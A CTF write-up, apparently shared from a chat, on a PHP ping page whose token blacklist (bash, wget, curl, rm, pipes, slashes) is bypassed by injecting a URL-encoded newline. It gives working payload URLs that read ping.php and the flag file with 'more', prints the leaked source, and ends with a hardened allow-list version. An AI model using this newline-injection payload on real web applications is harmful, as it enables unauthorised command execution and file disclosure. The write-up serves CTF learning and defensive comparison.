A challenge someone shared in a CTF group chat: http://45.124.115.155:8003/a74a15c5fb626077/
ls, cat and the like are all filtered (http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms
::::::::::::::
ping.php
::::::::::::::
'sbsbbsb',
';' => 'sb',
'|' => 'sb',
'-' => 'sb',
'$' => 'sb',
'(' => 'sb',
')' => 'sb',
'`' => 'sb',
'||' => 'sb',
'<>' => 'sb',
'bash' => 'sb',
'>' => 'sb',
'wget' => 'sb',
'cat' => '',
'cd' => 'sb',
'../' => 'sb',
'/' => 'sb',
'rm' => 'sb',
'>>' => 'sb',
'echo' => 'sb',
'curl' => 'sb',
'dd' => 'sb',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// var_dump($target);
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 1 ' . $target );
}
// Feedback for the end user
echo "{$cmd}";
%0a represents a newline; the blacklist above replaces single tokens but never touches the newline, so the shell still sees a second command after the ping.
more reads the file (learning a bit of ops back then turned out to be quite useful).
payload: http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php
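For comparison, an added example (not the challenge's code) that keeps the same ping logic but validates the input as an IP address and quotes it before it reaches the shell; the names `blacklist_filter` and `safe_ping_command` are assumed for this illustration:

```php
<?php
// Added example, not part of the original challenge source.
// The original handler denies a list of tokens; a newline is not in the
// list, so str_replace passes it through to shell_exec unchanged.

// Assumed helper: a cut-down copy of the original deny-list logic.
function blacklist_filter(string $target): string {
    $substitutions = array(';' => 'sb', '|' => 'sb', '$' => 'sb',
        '`' => 'sb', '>' => 'sb', '/' => 'sb', 'cat' => '');
    return str_replace(array_keys($substitutions), $substitutions, $target);
}

// Hardened handler: allow-list the input shape instead of denying tokens.
function safe_ping_command(string $ip): ?string {
    // Only a literal IPv4/IPv6 address is accepted; newlines, spaces,
    // hostnames and shell metacharacters all fail this check.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // Defense in depth: single-quote the argument for /bin/sh so that
    // even a value that slips past validation cannot start a new command.
    return 'ping -c 1 ' . escapeshellarg($ip);
}

// Constructed sample input mirroring the writeup's payload shape.
$tainted = "127.0.0.1\nmore ping.php";

// Deny-list: the embedded newline is still present in the result.
$filtered = blacklist_filter($tainted);
echo "deny-list kept a newline: " . var_export(str_contains($filtered, "\n"), true) . "\n";

// Allow-list: the same input is rejected before any command is built.
$cmd = safe_ping_command($tainted);
echo "allow-list accepted tainted input: " . var_export($cmd !== null, true) . "\n";

// A plain address is still allowed and arrives quoted.
echo safe_ping_command('127.0.0.1') . "\n";
```

`str_contains` needs PHP 8; on older versions `strpos($filtered, "\n") !== false` does the same job.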